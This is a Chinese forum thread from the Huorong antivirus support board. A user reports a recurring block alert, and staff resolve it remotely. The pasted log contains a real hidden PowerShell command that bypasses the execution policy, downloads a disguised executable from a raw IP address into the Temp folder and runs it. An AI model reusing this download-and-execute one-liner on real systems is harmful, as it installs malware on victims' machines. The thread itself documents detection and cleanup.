火绒安全软件

动态防御问题反馈
发新帖
打印 上一主题 下一主题

mobsync.exe触犯敏感动作防护规则,已阻止

[复制链接]
6118 5
楼主
发表于 2020-4-19 22:27:03 | 只看该作者 |只看大图 |倒序浏览 |阅读模式
跳转到指定楼层
本帖最后由 15555676152 于 2020-4-19 22:35 编辑

每天都会提示,日志是一样的:


===================================================================
操作进程:C:\Windows\System32\mobsync.exe
命令行:C:\Windows\System32\mobsync.exe -Embedding
父进程:C:\Windows\system32\svchost.exe
防护项目:隐藏执行PowerShell
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -nop -w hidden -c (new-object System.Net.WebClient).DownloadFile('http://123.56.123.76/pdd/InVan.jpg','C:\Users\LJL\AppData\Local\Temp\InVan.exe');start-process 'C:\Users\LJL\AppData\Local\Temp\InVan.exe';
操作结果:已阻止


==================================================================

ZS64D4}58[KMQAF)WR(%4C6.png (55.66 KB, 下载次数: 3002)

ZS64D4}58[KMQAF)WR(%4C6.png
回复

使用道具 举报

6118 5
沙发
发表于 2020-4-20 09:54:09 | 只看该作者
您好,建议您使用火绒全盘查杀,之后重启电脑,观察下,如果问题仍然无法解决,请添加QQ:2208613431,我们远程帮您看下问题,感谢您的反馈!
回复

使用道具 举报

6118 5
板凳
发表于 2020-4-20 10:04:05 | 只看该作者
试了,不行的
回复

使用道具 举报

6118 5
地板
发表于 2020-4-20 10:07:03 | 只看该作者
加你qq了,这主要是什么问题呢?天天都会出来,有点烦人
回复

使用道具 举报

6118 5
5#
发表于 2020-4-20 10:13:44 | 只看该作者
15555676152 发表于 2020-4-20 10:07
加你qq了,这主要是什么问题呢?天天都会出来,有点烦人

好的,QQ和您沟通!
回复

使用道具 举报

6118 5
6#
发表于 2020-4-20 17:37:04 | 只看该作者
您好,您的问题已通过远程解决,感谢您的反馈!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | [立即注册]

本版积分规则

快速回复 返回顶部 返回列表